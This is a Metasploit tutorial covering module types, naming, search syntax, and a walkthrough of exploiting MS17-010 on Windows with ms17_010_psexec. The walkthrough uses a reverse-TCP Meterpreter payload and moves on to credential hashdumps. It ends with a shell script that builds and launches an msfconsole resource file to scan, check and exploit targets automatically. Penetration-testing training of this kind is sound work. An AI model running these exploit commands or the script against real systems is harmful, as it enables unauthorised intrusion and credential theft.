Working with Metasploit Modules

Overview of Metasploit Modules

Metasploit's modules are pre-built Ruby classes, each performing one task such as scanning, exploitation, post-exploitation, payload generation, or evasion. They are a cornerstone of the framework, enabling penetration testers to streamline their workflows and automate repeatable steps.

Purpose of Modules:

  • Automate repetitive processes.

  • Enhance manual testing by providing reusable functionality.

  • Organize tools and exploits into categorized scripts.

Types of Metasploit Modules

  1. Auxiliary Modules:

    • Non-exploit modules for scanning, fuzzing, sniffing, and information gathering.

    • Example:

      auxiliary/scanner/smb/smb_version
  2. Encoders:

    • Transform a payload's bytes so it avoids characters the target will not accept (for example null bytes in a string-handling bug); changing its on-disk signature is a side effect. Treat the antivirus (AV) bypass effect as historical: common encoders such as shikata_ga_nai are themselves well fingerprinted, and the decoded payload is unchanged in memory. Evasion today is the job of evasion modules and custom loaders, not encoders.

    • Example:

      x86/shikata_ga_nai
  3. Exploits:

    • Exploit vulnerabilities in systems or applications.

    • Example:

      exploit/windows/smb/ms17_010_eternalblue
  4. NOPs (No-Operation):

    • Generate no-operation sleds, used to pad a payload to a fixed size or to give a return address a landing zone in front of the shellcode. Several generators emit NOP-equivalent instructions instead of a run of 0x90 bytes, so the sled is harder to signature.

    • Example:

      x86/single_byte
  5. Payloads:

    • Code delivered to the target after a successful exploit, usually to obtain a shell or Meterpreter session. Staged payloads (windows/meterpreter/reverse_tcp) send a small stager that fetches the rest over the connection; stageless payloads (windows/meterpreter_reverse_tcp) carry everything in one blob, which is larger but avoids the second download.

    • Example:

      windows/meterpreter/reverse_tcp
  6. Post-Exploitation Modules:

    • Perform tasks after gaining access, such as lateral movement or data extraction.

    • Example:

      post/windows/gather/hashdump
  7. Evasion Modules:

    • Generate payload executables built to get past specific endpoint defences; they are selected and configured in the same way as exploits.

    • Example:

      evasion/windows/windows_defender_exe
  8. Plugins:

    • Extend msfconsole itself rather than acting on a target. They live outside the module tree and are activated with load <name> (for example, to import results from a vulnerability scanner).

    • Example:

      openvas

Module Structure

Modules are organized hierarchically based on their type, target OS, service, and functionality.

General Format:

<type>/<os>/<service>/<module_name>

Example:

exploit/windows/http/iis_webdav_scstoragepathfromurl

Components Explained:

  1. Type: Module category (exploit, auxiliary, post, payload, encoder, nop, evasion). Search output shows the full name with the type; the use command accepts the name with or without it.

  2. Operating System: Target OS or platform (e.g., windows, linux, multi for cross-platform). For auxiliary modules this position holds a functional category instead, such as scanner, admin, dos or gather, as in auxiliary/scanner/smb/smb_version above.

  3. Service: Vulnerable application or protocol (e.g., http, smb).

  4. Name: Descriptive identifier of the module, usually the product plus the vulnerable component or the advisory ID, which makes it a good search term.

Searching for Modules

Use the search command to locate modules based on specific criteria.

Syntax:

search [<options>] [<keyword>:<value> ...]

Keywords (cve, type, platform, name, author, port, rank, and others listed by search -h) can be combined; a value prefixed with - excludes matching modules. Bare words without a keyword are matched against module names, paths and descriptions.

Examples:

  • Search for modules related to MS17-010 (matches the module path and description):

    search ms17_010
  • Restrict results to exploits whose CVE references contain 2009, i.e. CVEs from that year (cve: matches part of the ID, so a full ID such as cve:2017-0144 also works):

    search cve:2009 type:exploit
  • Exclude specific platforms (e.g., Linux) with a leading - on the value:

    search platform:-linux

Search Options:

  Option        Description
  -h            Display help for the search command, including the full keyword list.
  -o <file>     Write the results to <file> in CSV format.
  -S <regex>    Keep only result rows matching the regular expression.
  -s <column>   Sort results by a column (rank, date, name, type, check).
  -r            Reverse the sort order (used together with -s).
  -u            Load the module immediately if the search returns exactly one result.

Using Modules: Practical Example

Scenario: Exploiting MS17-010 with exploit/windows/smb/ms17_010_psexec, the module that implements the EternalRomance, EternalSynergy and EternalChampion techniques. It is generally more reliable than ms17_010_eternalblue, which can blue-screen the target, but it needs a named pipe on the target that it can reach (anonymously by default, or with SMBUser/SMBPass).

  1. Search for the Exploit:

    msf6 > search ms17_010
  2. Confirm the Vulnerability First (the scanner module is non-destructive):

    msf6 > use auxiliary/scanner/smb/smb_ms17_010
    msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS <target_IP>
    msf6 auxiliary(scanner/smb/smb_ms17_010) > run
  3. Select the Module:

    msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_psexec
  4. View Module Information (description, references, targets, reliability notes):

    msf6 exploit(windows/smb/ms17_010_psexec) > info
  5. Configure Options (LHOST is the address the default windows/meterpreter/reverse_tcp payload connects back to; change LPORT if 4444 is already in use):

    msf6 exploit(windows/smb/ms17_010_psexec) > options
    msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS <target_IP>
    msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST <attacker_IP>
  6. Run the Module's Own Check (if a module reports that check is not supported, rely on the scanner result from step 2):

    msf6 exploit(windows/smb/ms17_010_psexec) > check
  7. Execute the Exploit:

    msf6 exploit(windows/smb/ms17_010_psexec) > run
  8. Post-Exploitation:

    • A successful run opens a Meterpreter session running as SYSTEM. Use its commands (getuid, sysinfo, hashdump) or post modules (run post/windows/gather/hashdump) to confirm privileges, harvest credentials and move further into the environment.
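The same workflow can be replayed without typing each command, using an msfconsole resource script. The script below is an added example and is not part of the original page or of the Metasploit project: it writes an .rc file that runs the non-destructive scanner first, then loads ms17_010_psexec, runs its check, and exploits with -z so the session is backgrounded and the remaining lines still execute. The module names are real Metasploit modules; the function names, the file name and the placeholder addresses in main (RFC 5737 documentation ranges) are this example's own assumptions, and nothing is sent to a host unless msfconsole is installed and you pass real targets.

```shell
#!/bin/sh
# Added example, not from the original page or the Metasploit project:
# build an msfconsole resource script (.rc) that replays the MS17-010
# workflow non-interactively: verify first, exploit second.
# Module names are real; function names and placeholder addresses are ours.
set -eu

# build_ms17_010_rc RHOSTS LHOST [LPORT]
# Prints one msfconsole command per line; '#' lines are comments to msfconsole.
build_ms17_010_rc() {
    rhosts="$1"; lhost="$2"; lport="${3:-4444}"
    cat <<EOF
# 1. Non-destructive check with the scanner module before any exploit runs.
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS ${rhosts}
run

# 2. Load the EternalRomance/EternalSynergy/EternalChampion module.
use exploit/windows/smb/ms17_010_psexec
set RHOSTS ${rhosts}
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ${lhost}
set LPORT ${lport}

# 3. The module's own check, where implemented.
check

# 4. -z keeps the new session in the background instead of interacting,
#    so the remaining lines of this script still execute.
exploit -z

# 5. Show what we got; the console stays open for manual work afterwards.
sessions -l
EOF
}

# count_rc_commands TEXT: number of lines msfconsole will actually execute
# (everything except comment and blank lines), as a sanity check on the file.
count_rc_commands() {
    printf '%s\n' "$1" | grep -cv -e '^[[:space:]]*#' -e '^[[:space:]]*$'
}

main() {
    rhosts="${1:-192.0.2.10}"   # placeholder target (documentation range)
    lhost="${2:-192.0.2.1}"     # placeholder listener address
    rc_file="ms17_010.rc"       # file name chosen for this example
    build_ms17_010_rc "$rhosts" "$lhost" > "$rc_file"
    echo "wrote $rc_file with $(count_rc_commands "$(cat "$rc_file")") commands"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc_file"
    else
        echo "msfconsole not installed here; run: msfconsole -q -r $rc_file"
    fi
}

main "$@"
```

Run it as sh ms17_010_rc.sh <target_IP> <attacker_IP>; the .rc file is written either way, so the commands can be reviewed before being handed to msfconsole -q -r. Because exploit -z backgrounds the session, the console is left at its prompt with the session listed, which is the natural handoff to post-exploitation.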


Command Cheatsheet

  Command               Description
  search <keyword>      Locate modules matching the keyword.
  use <module_path>     Load a module into the console (the leading type, e.g. exploit/, is optional).
  info                  Display detailed information about the loaded module, including references and targets.
  show options          List configurable parameters for the module and its payload (options is an alias).
  set <option> <value>  Configure an option for the current module only; setg sets it globally.
  show payloads         View payloads compatible with the module.
  show targets          List targets supported by the module.
  check                 Ask the module whether the target is vulnerable without exploiting it (not every module implements it).
  run or exploit        Execute the module; exploit -j runs it as a background job, exploit -z does not interact with the session.
  sessions -l           List open sessions; sessions -i <id> interacts with one.
  back                  Unload the current module and return to the top-level prompt.